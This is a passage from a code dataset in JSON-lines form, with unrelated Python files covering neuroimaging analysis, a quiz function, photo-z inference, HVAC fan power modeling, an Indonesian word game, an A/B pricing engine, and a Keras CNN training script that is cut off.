pd.read_hdf('/Volumes/flxrl/FLEXRULE/SubjectLevel/sub-17/BehavFrame_sub-17_ses-2.hdf', key='inference_run-4')\npupil = pd.read_hdf('/Volumes/flxrl/FLEXRULE/pupil/linear_pupilframes/PupilFrame_17_ses-2.hdf', key='/inference_run-4')\nbrain = pd.read_hdf('/Volumes/flxrl/FLEXRULE/SubjectLevel/sub-17/BrainstemRois_sub-17_ses-2.hdf', key='inference_run-4')\nmaster = execute('sub-17', 'ses-2', 'inference_run-4', 'inference', '/Volumes/flxrl/FLEXRULE/', behav, pupil, brain)\n'''\n","sub_path":"decim/fmri_workflow/SwitchEpochs.py","file_name":"SwitchEpochs.py","file_ext":"py","file_size_in_byte":7850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"303148000","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 16 19:26:56 2017\n\n@author: newuser\n\"\"\"\n\ndef max_contig_sum(L):\n \"\"\" L, a list of integers, at least one positive\n Returns the maximum sum of a contiguous subsequence in L \"\"\"\n\n \"\"\"\n for example:\n in the list [3, 4, -1, 5, -4], the maximum sum is 3+4-1+5 = 11\n in the list [3, 4, -8, 15, -1, 2], the maximum sum is 15-1+2 = 16\n \"\"\" \n \n best = 0 \n candidate = 0\n\n for i in range(len(L)+1):\n for j in range(len(L)+1):\n candidate = sum(L[i:j])\n if candidate > best:\n best = candidate\n \n return best\n\n","sub_path":"Quiz/max_contig_sum.py","file_name":"max_contig_sum.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227505105","text":"def check_prob_params(params):\n \"\"\"\n Sets parameter values pertaining to components of probability\n\n Parameters\n ----------\n params: dict\n dictionary containing key/value pairs for probability\n\n Returns\n -------\n params: dict\n dictionary containing key/value pairs for probability\n \"\"\"\n if 'prior_mean' not in 
params:\n params['prior_mean'] = 'interim'\n else:\n params['prior_mean'] = params['prior_mean'][0]\n if 'no_prior' not in params:\n params['no_prior'] = 0\n else:\n params['no_prior'] = int(params['no_prior'][0])\n if 'no_data' not in params:\n params['no_data'] = 0\n else:\n params['no_data'] = int(params['no_data'][0])\n return params\n\n# def make_true_nz(test_name):\n# \"\"\"\n# Function to create true redshift distribution to be shared among several\n# test cases\n#\n# Parameters\n# ----------\n# test_name: string\n# name used to look up parameters for making true_nz\n#\n# Returns\n# -------\n# true_nz: chippr.gmix object\n# gaussian mixture probability distribution\n#\n# Notes\n# -----\n# test_name is currently ignored but will soon be used to load parameters for making true_nz instead of hardcoded values.\n# \"\"\"\n# true_amps = np.array([0.20, 0.35, 0.55])\n# true_means = np.array([0.5, 0.2, 0.75])\n# true_sigmas = np.array([0.4, 0.2, 0.1])\n#\n# true_nz = chippr.gmix(true_amps, true_means, true_sigmas, limits=(0., 1.))\n#\n# return true_nz\n\ndef set_up_prior(data, params):\n \"\"\"\n Function to create prior distribution from data\n\n Parameters\n ----------\n data: dict\n catalog dictionary containing bin endpoints, log interim prior, and log\n interim posteriors\n params: dict\n dictionary of parameter values for creation of prior\n\n Returns\n -------\n prior: chippr.mvn object\n prior distribution as multivariate normal\n \"\"\"\n zs = data['bin_ends']\n log_nz_intp = data['log_interim_prior']\n log_z_posts = data['log_interim_posteriors']\n\n z_difs = zs[1:]-zs[:-1]\n z_mids = (zs[1:]+zs[:-1])/2.\n n_bins = len(z_mids)\n\n n_pdfs = len(log_z_posts)\n\n a = 1.# / n_bins\n b = 3.#1. / z_difs ** 2\n c = 3.e-2#a / n_pdfs\n prior_var = np.eye(n_bins)\n for k in range(n_bins):\n prior_var[k] = a * np.exp(-0.5 * b * (z_mids[k] - z_mids) ** 2)\n prior_var += c * np.identity(n_bins)\n\n prior_mean = log_nz_intp\n prior = mvn(prior_mean, prior_var)\n if params['prior_mean'] == 'sample':\n new_mean = prior.sample_one()\n prior = mvn(new_mean, prior_var)\n print(params['prior_mean'], prior_mean, new_mean)\n else:\n print(params['prior_mean'], prior_mean)\n\n return (prior, prior_var)\n\ndef do_inference(given_key):\n \"\"\"\n Function to do inference from a catalog of photo-z interim posteriors\n\n Parameters\n ----------\n given_key: string\n name of test case to be run\n \"\"\"\n test_info = all_tests[given_key]\n test_name = test_info['name']\n\n test_name = test_name[:-1]\n param_file_name = test_name + '.txt'\n\n params = chippr.utils.ingest(param_file_name)\n params = check_prob_params(params)\n params = defaults.check_inf_params(params)\n print(params)\n\n test_dir = os.path.join(result_dir, test_name)\n simulated_posteriors = catalog(params=param_file_name, loc=test_dir, prepend=test_name)\n saved_location = 'data'\n saved_type = '.txt'\n data = simulated_posteriors.read(loc=saved_location, style=saved_type)\n zs = data['bin_ends']\n z_difs = zs[1:]-zs[:-1]\n with open(os.path.join(os.path.join(test_dir, saved_location), 'true_vals.txt'), 'r') as true_file:\n true_data = csv.reader(true_file, delimiter=' ')\n true_vals = []\n for z in true_data:\n true_vals.append(float(z[0]))\n true_vals = np.array(true_vals)\n true_vals = np.histogram(true_vals, bins=zs, normed=True)[0]\n true_nz = chippr.discrete(zs, true_vals)\n\n (prior, cov) = set_up_prior(data, params)\n\n nz = log_z_dens(data, prior, truth=true_nz, loc=test_dir, prepend=test_name, vb=True)\n\n nz_stacked = 
nz.calculate_stacked()\n # print('stacked: '+str(np.dot(np.exp(nz_stacked), z_difs)))\n nz_mmap = nz.calculate_mmap()\n # print('MMAP: '+str(np.dot(np.exp(nz_mmap), z_difs)))\n # nz_mexp = nz.calculate_mexp()\n # print('MExp: '+str(np.dot(np.exp(nz_mexp), z_difs)))\n\n start_mmle = timeit.default_timer()\n nz_mmle = nz.calculate_mmle(nz_stacked, no_data=params['no_data'], no_prior=params['no_prior'])\n end_mmle = timeit.default_timer()-start_mmle\n print('MMLE: '+str(np.dot(np.exp(nz_mmle), z_difs))+' in '+str(end_mmle))\n\n nz_stats = nz.compare()\n nz.plot_estimators(log=True, mini=False)\n nz.plot_estimators(log=False, mini=False)\n nz.write('nz.p')\n #\n # # COMMENT OUT TO AVOID SAMPLING\n # #start_mean = mvn(nz_mmle, cov).sample_one()\n # start = prior#mvn(data['log_interim_prior'], cov)\n #\n # n_bins = len(zs) - 1\n # if params['n_walkers'] is not None:\n # n_ivals = params['n_walkers']\n # else:\n # n_ivals = 10 * n_bins\n # initial_values = start.sample(n_ivals)\n #\n # start_samps = timeit.default_timer()\n # nz_samps = nz.calculate_samples(initial_values, no_data=params['no_data'], no_prior=params['no_prior'], n_procs=1)\n # time_samps = timeit.default_timer()-start_samps\n # print('Sampled '+str(params['n_accepted'])+' after '+str(nz.burn_ins * params['n_burned'])+' in '+str(time_samps))\n #\n # nz_stats = nz.compare()\n # nz.plot_estimators(log=True, mini=False)\n # nz.plot_estimators(log=False, mini=False)\n # nz.write('nz.p')\n\nif __name__ == \"__main__\":\n\n import numpy as np\n import pickle\n import os\n import multiprocessing as mp\n\n import chippr\n from chippr import *\n\n result_dir = os.path.join('..', 'results')\n # name_file = 'which_inf_tests.txt'\n tests_to_run = ['0single_lsst ', '1single_lsst ', '2single_lsst ', '3single_lsst ']\n\n # with open(name_file) as tests_to_run:\n all_tests = {}\n for test_name in tests_to_run:\n test_info = {}\n test_info['name'] = test_name\n all_tests[test_name] = test_info\n\n nps = mp.cpu_count()\n pool = mp.Pool(nps)\n pool.map(do_inference, all_tests.keys())\n","sub_path":"research/scripts/cosmolike_inf_script.py","file_name":"cosmolike_inf_script.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"117728541","text":"#! /usr/bin/python\n\"\"\"Model the evaporator fan power consumption\nfrom H.G. 
data acquisition system.\"\"\"\n\nimport csv\nfrom datetime import datetime, timedelta\nimport fnmatch\nimport re\nimport pdb\n\nimport numpy as np\nfrom scipy.stats import t\n\nclass FAN_STAT:\n \"\"\" A class to store parameters for the statistics of the evaporator fan\n power estimation\n\n count : integer\n number of data points used to solve the evaporator fan\n cov : float\n coefficient of variation\n power : float\n estimated fan power consumption\n uncer_mea : float\n uncertainty of the measured fan power consumption\n uncer : float\n uncertainty of the estimated fan power consumption\n skew : float\n skewness of the distribution\n hyp : float\n results for the hypothesis testing: between 1 and -1 for unbias\n rel_dev : float\n % of uncertainty from deviation\n rel_cov : float\n % of uncertainty from covariance\n rel_train : float\n % of uncertainty from training data\n rel_input : float\n % of uncertainty from input\n rel_output : float\n % of uncertainty from output\n \"\"\"\n def __init__(self):\n self.count = -1\n self.cov = -1.0\n self.power = -1.0\n self.uncer = float('nan')\n self.uncer_mea = float('nan')\n self.skew = -1.0\n self.hyp = float('nan')\n self.rel_dev = 0.0\n self.rel_cov = 0.0\n self.rel_train = 0.0\n self.rel_input = 0.0\n self.rel_output = 0.0\n\n\ndef evap_fan_power_data(rtu):\n \"\"\"Identify the measurement and uncertainty\n of evaporator fan power consumption in\n different RTUs\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n\n Returns\n -------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n with addition of the following columns:\n PWR_IDF: average fan power at each data point in kW\n UNCER_PWR_IDF: uncertainty of measurement in PWR_IDF\n in kW\n RT_IDF: Number of time stamps for the data point,\n mark at the LAST time stamp at each data point\n \"\"\"\n\n u_energy = 0.05 # uncertainty at each data point = 0.05 kWh\n u_time = 0.0 # uncertainty at each time stamp = 30s\n IDF_name = 'IDF'\n pow_name = ''.join(['PWR_', IDF_name])\n uncer_name = ''.join(['UNCER_', pow_name])\n rt_name = ''.join(['RT_', IDF_name])\n for unit in rtu:\n # assign new columns in the rtu data for storing evap. fan power\n # flags for one data point and uncertainty of fan power\n rtu[unit][pow_name] = np.nan # in kW\n rtu[unit][uncer_name] = np.nan # in kW\n rtu[unit][rt_name] = np.nan\n\n # identify all time steps which only the evap. 
fan\n # is running\n cond_state = (rtu[unit].S_CMP == 0) & (rtu[unit].S_ODF == 0)\\\n & (rtu[unit].S_IDF == 1)\n rtu_temp = rtu[unit][cond_state]\n\n # find the separation of data point\n power_mea = []\n u_power_mea = []\n old_index = 0\n for i in range(1, rtu_temp.index.size):\n if (\n rtu_temp.index[i]-rtu_temp.index[i-1] != timedelta(0, 60) or\n i == rtu_temp.index.size-1\n ):\n begin = rtu_temp.index[old_index]\n end = rtu_temp.index[i-1]\n if not i-1 == old_index:\n # must contain at least 2 time stamps to avoid initial count\n # towards power of other equipment\n time = (end-begin).seconds\n energy = (rtu_temp.PWR_RTU[begin:end].sum())*3600.0\n else:\n # do not use if there are only two or less time steps\n energy = 0\n time = 0\n if energy > u_energy*3600.0:\n # only return them if there is a measurement\n # from the energy meter\n rtu[unit][begin:end][pow_name] = energy/time\n rtu[unit][begin:end][uncer_name] = \\\n np.sqrt(\n 2.0*(u_energy*3600.0/time)**2 +\n 2.0*(energy/time**2*u_time)**2\n )\n rtu[unit].RT_IDF[end] = time/60.0\n # move to the other data point\n old_index = i\n\n\ndef evap_fan_power_model(rtu, limit=0.05, begin_date=None, end_date=None):\n \"\"\"Identify the measurement and uncertainty\n of evaporator fan power consumption in\n different RTUs\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n limit : double, optional\n a limit to the relative uncertainty of the evaporator fan power\n any evap. fan with relative uncertainty larger than limit will\n not be averaged\n begin_date : string, required\n beginning date of the training data\n end_date : string, optional\n ending date of the training data\n\n Returns\n -------\n fan_stat : fan_stat()\n a class containing the statistics of the estimation results\n \"\"\"\n\n if begin_date is None:\n raise Exception('Require a beginning date for evaporator modeling!')\n if end_date is None:\n end_date = begin_date\n\n fan_power = 'PWR_IDF_EST'\n uncer_fan_power = ''.join(['UNCER_', fan_power])\n STAT = {}\n\n for unit in rtu:\n # introduce statistic structure\n STAT[unit] = FAN_STAT()\n\n # valid power condition\n valid_pow = (rtu[unit].RT_IDF > 0) & \\\n (rtu[unit].UNCER_PWR_IDF/rtu[unit].PWR_IDF < limit)\n evap_state = (rtu[unit].S_IDF == 1)\n\n # mean values\n if fan_power not in rtu[unit]:\n rtu[unit][fan_power] = 0.0\n rtu[unit].PWR_IDF_EST[evap_state] = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].mean()\n\n # uncertainty values and statistics\n if uncer_fan_power not in rtu[unit]:\n rtu[unit][uncer_fan_power] = np.nan\n count = rtu[unit][valid_pow][begin_date:end_date].index.size\n mea_uncer = np.mean(\n np.array(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]\n )/np.array(\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date]\n )\n )*rtu[unit].PWR_IDF_EST[evap_state][0]\n\n STAT[unit].count = count\n STAT[unit].uncer_mea = mea_uncer/rtu[unit].PWR_IDF_EST[evap_state][0]\n STAT[unit].power = rtu[unit].PWR_IDF_EST[evap_state][0]\n if count > 1:\n t_stat = t.interval(0.95, count-1)[1]\n fan_power_std = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].std()\n rtu[unit].UNCER_PWR_IDF_EST[evap_state] = np.sqrt(\n (1.+1./count**2)*(t_stat*fan_power_std)**2+np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/count**2+mea_uncer**2\n )\n STAT[unit].cov = fan_power_std/STAT[unit].power\n STAT[unit].skew = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].skew()\n 
STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].rel_dev = (t_stat*fan_power_std)**2/STAT[unit].uncer**2\n STAT[unit].rel_cov = \\\n (t_stat*fan_power_std)**2/STAT[unit].uncer**2/count**2\n STAT[unit].rel_train = np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/count**2/STAT[unit].uncer**2\n STAT[unit].hyp = (\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] -\n rtu[unit].PWR_IDF_EST[evap_state][0]\n ).sum()/fan_power_std/t_stat/np.sqrt(count)\n else:\n rtu[unit].UNCER_PWR_IDF_EST[evap_state] = np.sqrt(\n np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )+mea_uncer**2\n )\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].rel_train = np.sum(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]**2\n )/STAT[unit].uncer**2\n STAT[unit].rel_output = mea_uncer**2/STAT[unit].uncer**2\n\n return STAT\n\n\ndef evap_fan_power_valid(rtu, limit=0.05, begin_date=None, end_date=None):\n \"\"\"Use the estimated results to create statistics for validation data\n\n Inputs\n ----------\n rtu : pandas.Dataframe, required\n pandas Dataframe containing data from different RTUs,\n categorized by function analyze in hg_proc.py\n limit : double, optional\n a limit to the relative uncertainty of the evaporator fan power\n any evap. fan with relative uncertainty larger than limit will\n not be averaged\n begin_date : string, required\n beginning date of the validation data\n end_date : string, optional\n ending date of the validation data\n\n Returns\n -------\n fan_stat : fan_stat()\n a class containing the statistics of the estimation results\n \"\"\"\n\n if begin_date is None:\n raise Exception('Require a beginning date for evaporator modeling!')\n if end_date is None:\n end_date = begin_date\n\n fan_power = 'PWR_IDF_EST'\n uncer_fan_power = ''.join(['UNCER_', fan_power])\n STAT = {}\n\n for unit in rtu:\n # introduce statistic structure\n STAT[unit] = FAN_STAT()\n\n # valid power condition\n valid_pow = (rtu[unit].RT_IDF > 0) & \\\n (rtu[unit].UNCER_PWR_IDF/rtu[unit].PWR_IDF < limit)\n evap_state = (rtu[unit].S_IDF == 1)\n\n # uncertainty values and statistics\n if uncer_fan_power not in rtu[unit]:\n rtu[unit][uncer_fan_power] = np.nan\n count = rtu[unit][valid_pow][begin_date:end_date].index.size\n mea_uncer = np.mean(\n np.array(\n rtu[unit].UNCER_PWR_IDF[valid_pow][begin_date:end_date]\n )/np.array(\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date]\n )\n )*rtu[unit].PWR_IDF_EST[evap_state][0]\n\n STAT[unit].count = count\n STAT[unit].uncer_mea = mea_uncer/rtu[unit].PWR_IDF_EST[evap_state][0]\n STAT[unit].power = rtu[unit].PWR_IDF_EST[evap_state][0]\n if count > 1:\n t_stat = t.interval(0.95, count-1)[1]\n fan_power_std = np.sqrt(np.sum((\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] - \n rtu[unit][valid_pow].PWR_IDF_EST[begin_date:end_date]\n )**2)/(count-1))\n STAT[unit].cov = fan_power_std/STAT[unit].power\n STAT[unit].skew = \\\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date].skew()\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n STAT[unit].hyp = (\n rtu[unit][valid_pow].PWR_IDF[begin_date:end_date] -\n rtu[unit].PWR_IDF_EST[evap_state][0]\n ).sum()/fan_power_std/t_stat/np.sqrt(count)\n else:\n STAT[unit].uncer = \\\n rtu[unit][valid_pow].UNCER_PWR_IDF_EST[evap_state][0]\n\n return STAT\n\n\nif __name__ == '__main__':\n # for testing with all data\n # debugging only\n import numpy as np\n import matplotlib.pyplot as plt\n\n 
import hg_proc as hg\n import evap_fan_modeling as fan\n\n # read and extract data\n df, rtu = hg.analyze('./Data/')\n fan.evap_fan_power_data(rtu)\n fan.evap_fan_power_model(\n rtu, begin_date='2013-06-20', end_date='2013-07-20'\n )\n\n # show the plots for uncertainty analysis\n for unit in rtu:\n fig = plt.figure(unit)\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel(\n 'Measurment uncertainty [kW]', fontsize='x-large',\n multialignment='center'\n )\n plt.scatter(\n rtu[unit].PWR_IDF[rtu[unit].RT_IDF > 0],\n rtu[unit].UNCER_PWR_IDF[rtu[unit].RT_IDF > 0],\n s=30, c='b', marker='o'\n )\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n graph_filename = 'Evap_fan_uncertainty'+'_'+'RTU_'+str(unit)+'.png'\n plt.savefig(graph_filename, dpi=400)\n\n # show the histogram of the power measured\n for unit in rtu:\n fig = plt.figure(unit+10)\n hist, bins = np.histogram(\n rtu[unit].PWR_IDF[rtu[unit].RT_IDF > 0],\n bins=10\n )\n width = 0.7*(bins[1]-bins[0])\n center = (bins[:-1]+bins[1:])/2\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel('Frequency', fontsize='x-large', multialignment='center')\n plt.bar(center, hist, align='center', width=width)\n graph_filename = 'Evap_fan'+'_'+'RTU_'+str(unit)+'.png'\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n plt.savefig(graph_filename, dpi=400)\n del hist, bins\n\n # show a plot of the estimated power to the measured power\n for unit in rtu:\n evap_state = (rtu[unit].RT_IDF > 0)\n fig = plt.figure(unit+100)\n plt.errorbar(\n rtu[unit].PWR_IDF[evap_state],\n rtu[unit].PWR_IDF_EST[evap_state],\n yerr=rtu[unit].UNCER_PWR_IDF_EST[evap_state],\n xerr=rtu[unit].UNCER_PWR_IDF[evap_state], fmt='bo'\n )\n plt.scatter(\n rtu[unit].PWR_IDF[evap_state],\n rtu[unit].PWR_IDF_EST[evap_state], s=30, c='b', marker='o'\n )\n plt.rc('xtick', labelsize='x-large')\n plt.rc('ytick', labelsize='x-large')\n plt.xlabel(\n 'Measured Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large'\n )\n plt.ylabel(\n 'Predicted Evaporator \\n Fan Power Consumption [kW]',\n fontsize='x-large', multialignment='center'\n )\n graph_filename = 'Evap_fan_EST'+'_'+'RTU_'+str(unit)+'.png'\n plt.gcf().subplots_adjust(bottom=0.15)\n plt.gcf().subplots_adjust(left=0.15)\n plt.savefig(graph_filename, dpi=400)\n\n # output answers\n for unit in rtu:\n evap_state = (rtu[unit].RT_IDF > 0)\n csv_filename = 'Evap_fan_result'+'_'+'RTU_'+str(unit)+'.csv'\n ofile = open(csv_filename, 'wb')\n writersummary = csv.writer(ofile)\n writersummary.writerow(\n ['Measured Power[kW]', 'Estimated Power[kW]',\n 'Measurement Uncertainty[kW]', 'Estimation Uncertainty[kW]']\n )\n for index in rtu[unit].index[evap_state]:\n writersummary.writerow(\n [rtu[unit].PWR_IDF[index],\n rtu[unit].PWR_IDF_EST[index],\n rtu[unit].UNCER_PWR_IDF[index],\n rtu[unit].UNCER_PWR_IDF_EST[index]]\n )\n ofile.close()\n\n plt.show()\n","sub_path":"evap_fan_modeling.py","file_name":"evap_fan_modeling.py","file_ext":"py","file_size_in_byte":15887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"174872799","text":"# Challenge no. 
3, Chapter 4, Python Programming for Absolute Beginner\r\n# I need to make a 'Word Jumble Game' with an improvement, which is a hint\r\n# if the user is desperate enough.\r\n# Muhammad Hadi, 24th of July 2018, written in Indonesian\r\n# Improvement(s) : -\r\n\r\n# importing random\r\n\r\nimport random\r\n\r\n# put KATA variable (tuple) that contains with words\r\n\r\nKATA = (\"kutubuku\",\"kupu-kupu\",\"kacamata\",\"ular\",\"python\",\"windows\",\"cacing besar alaska\")\r\n\r\nprint(\r\n \"\"\"\r\n\\t\\t\\tHalo! Selamat datang di permainan acak kata.\r\n\r\nAnda akan diberikan sebuah kata yang sudah diacak dan harus menyusun kata tersebut menjadi kata sebenarnya.\r\n\r\n\\nSetuju? (Yes/No)\r\n \"\"\")\r\n\r\n# jawaban is the response of the user, if they want to join (The Logang) or no:(\r\n\r\njawaban = input(\"\")\r\n\r\n# i put (jawaban) as (jawaban.lower) bcs sometimes ppl are not aware if their caps is on:(((\r\njawaban = jawaban.lower()\r\n\r\nwhile jawaban == \"yes\":\r\n print(\"\\nOke, langsung saja kita mulai! Tekan enter untuk memulai.\")\r\n input(\"\")\r\n kata_pilihan = random.choice(KATA)\r\n benar = kata_pilihan.lower()\r\n acak = \"\"\r\n\r\n# this is where we jumble the word\r\n\r\n while kata_pilihan:\r\n posisi = random.randrange(len(kata_pilihan))\r\n acak = acak + kata_pilihan[posisi]\r\n kata_pilihan = kata_pilihan[:posisi] + kata_pilihan[(posisi+1):]\r\n\r\n print(\"\\nOke, kata yang sudah diacak adalah:\", acak)\r\n jawaban_1 = input(\"Masukkan jawaban Anda: \")\r\n nilai = 100\r\n percobaan = 0\r\n \r\n while jawaban_1 != benar or jawaban_1 ==\"\":\r\n percobaan +=1\r\n nilai-=5\r\n print(\"\\nHmm, sepertinya Anda tidak menjawab dengan benar. Mau dibantu? (Ya/Tidak)\")\r\n respon = input(\"\")\r\n respon = respon.lower()\r\n if respon == \"\" or respon == \"tidak\":\r\n print(\"\\nHem, yaudah tebak lagi, deh: \")\r\n jawaban_1=input(\"\")\r\n if respon == \"ya\":\r\n print(\"Akhirnya harus buka hint, ya..\")\r\n nilai-=10\r\n if benar == \"kutubuku\":\r\n print(\"\\nBinatang penghisap darah + buku? :D\") \r\n elif benar == \"kupu-kupu\":\r\n print(\"\\nBinatang penghisap......\")\r\n elif benar == \"kacamata\":\r\n print(\"\\nGak bisa lihat kalau nggak pake ini:(( rabun:((\")\r\n elif benar == \"ular\":\r\n print(\"\\nAda spesies yang berderik\")\r\n elif benar == \"python\":\r\n print(\"\\nTerkenal dengan tipe file .py + app yang kalian gunakan untuk jalanin ini:((\")\r\n elif benar == \"windows\":\r\n print(\"\\nSalah satu sistem operasi........... jendela\")\r\n elif benar == \"cacing besar alaska\":\r\n print(\"\\nCacing di spongebob squarepants:(\")\r\n print(\"\\nUdah dapet belom? Coba tulis: \")\r\n jawaban_1=input(\"\")\r\n \r\n if jawaban_1 == benar:\r\n percobaan +=1\r\n print(\"\\nSelamat! Anda berhasil memecahkan kata yang diacak. Kata yang diacak adalah,\", benar,\"! Nilai anda\", nilai,\".\")\r\n print(\"\\nAnda berhasil melakukan ini dalam\",percobaan,\"percobaan.\")\r\n print(\"\\nIngin bermain lagi? 
(Ya/Tidak)\")\r\n jawaban=input(\"\")\r\n\r\n# signing out :D\r\n\r\nprint(\"\\nTerima kasih sudah membuka aplikasi ini.\")\r\nprint(\"\\nBot Hadi, signing out...\")\r\n\r\ninput(\"\\nTekan enter untuk keluar.\")\r\n \r\n","sub_path":"unfinished2.py","file_name":"unfinished2.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"226182350","text":"import json\nimport csv\nimport io\nimport time\n\nimport config\nimport core.util.debug as debug\nfrom core.pricing.jsondata import *\nfrom core.pricing.csvdata import *\nfrom core.pricing.metriccsvdata import *\nfrom core.pricing.dtjsondata import *\nfrom core.pricing.simdata import *\nfrom core.pricing.exceptions import *\nimport core.monitoring as monitor\n\n\n\nclass PricingEngine:\n\n\tcached = {}\n\n\tdef __init__(self, application_key):\n\t\timport core.content.content as content\n\t\tbackend = content.Content()\n\n\t\tself.groupAPrices = None\n\t\tself.groupBPrices = None\n\n\t\tself.abtest = backend.getABTest(application_key)\n\t\t\n\t\t# If there is no AB test for application.. we are done\n\t\tif self.abtest == None:\n\t\t\tmonitor.getMonitor().count('PricingNoPriceFound')\n\t\t\traise ApplicationNotFoundException()\n\t\t\n\t\tself.abtest = self.abtest.as_dict()\n\n\t\tif self.abtest['groupAPrices_key'] != None:\n\t\t\tself.groupAPrices = self.__loadPrices(self.abtest['groupAPrices_key'])\n\t\t\n\t\tif self.abtest['groupBPrices_key'] != None:\n\t\t\tself.groupBPrices = self.__loadPrices(self.abtest['groupBPrices_key'])\n\n\t@staticmethod\n\tdef getApplicationPricing(application_key):\n\t\tlastUpdated = PricingEngine.cached.get(application_key, {'time': None})['time']\n\n\t\tif lastUpdated == None or time.time()-lastUpdated>config.AnalyticsStorage['update']:\n\t\t\tPricingEngine.cached[application_key] = {\n\t\t\t\t'prices': PricingEngine(application_key),\n\t\t\t\t'time': time.time()\n\t\t\t}\n\n\t\treturn PricingEngine.cached[application_key]['prices']\n\n\n\t@staticmethod\n\tdef getPricingEngine(name):\n\t\tif name.upper() == 'JSON':\n\t\t\treturn JSONDataEngine\n\t\telif name.upper() == 'CSV':\n\t\t\treturn CSVDataEngine\n\t\telif name.upper() == 'METRICCSV':\n\t\t\treturn MetricCSVDataEngine\n\t\telif name.upper() == 'DTJSON':\n\t\t\treturn DTJSONData\n\t\telif name.upper() == 'SIM':\n\t\t\treturn SimDataEngine\n\t\traise DataEngineException('Pricing data engine not recognized')\n\n\t\n\t@staticmethod\n\tdef validate(price):\n\t\tif type(price) != dict:\n\t\t\tprice = price.as_dict()\n\n\t\tengine = PricingEngine.getPricingEngine(price['engine'])\n\t\tif engine == None:\n\t\t\traise DataEngineException('Unknown pricing engine')\n\n\t\tengine.validate(price)\n\n\n\tdef getPrices(self, user, progress, country=None):\n\t\t\n\t\tuserID = int(user, 16)\n\t\t\n\t\tmonitor.getMonitor().count('PricingUserRequest')\n\n\t\tif userID % self.abtest['modulus'] <= self.abtest['modulusLimit']:\n\t\t\tif self.groupAPrices:\n\t\t\t\treturn (self.abtest['groupAPrices_key'], self.groupAPrices.getPrices(progress, country))\n\t\t\telse:\n\t\t\t\traise NoPricingForGroup()\n\t\telse:\n\t\t\tif self.groupBPrices:\n\t\t\t\treturn (self.abtest['groupBPrices_key'], self.groupBPrices.getPrices(progress, country))\n\t\t\telse:\n\t\t\t\tmonitor.getMonitor().count('PricingNoPrice')\n\t\t\t\traise NoPricingForGroup()\n\n\t\treturn None\n\n\n\tdef __loadPrices(self, prices_key):\n\t\timport core.content.content as content\n\t\tbackend = content.Content()\n\n\t\tdata = 
backend.getPrice(prices_key).as_dict()\n\n\n\t\tengine = PricingEngine.getPricingEngine(data['engine'])\n\t\tif engine == None: \n\t\t\traise DataEngineException('Unknown pricing engine')\n\n\t\treturn engine(data)\n\t\t\n","sub_path":"core/pricing/pricing.py","file_name":"pricing.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73062000","text":"import json\nimport os.path\n\nimport numpy as np\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.preprocessing import OneHotEncoder\n\nfrom cnn import build_cnn\n\nWEIGHTS_DIR = \"data/weights/\"\nNB_EPOCH = 100\nBATCH_SIZE = 32\nAUGMENTATION = True\n\nif not os.path.exists(WEIGHTS_DIR):\n os.mkdir(WEIGHTS_DIR)\n\noh = OneHotEncoder()\n\ntrain_x, train_y = np.load(\"data/train_x.npy\"), np.load(\"data/train_y.npy\")\ntest_x, test_y = np.load(\"data/test_x.npy\"), np.load(\"data/test_y.npy\")\n\nn_subjects = len(set(train_y))\nn_train = train_x.shape[0]\nn_test = test_x.shape[0]\n\noh.fit(train_y.reshape(-1, 1))\n\ntrain_y = oh.transform(train_y.reshape(-1, 1)).todense()\ntest_y = oh.transform(test_y.reshape(-1, 1)).todense()\n\nprint(\"n_train: {}\".format(n_train))\nprint(\"n_test: 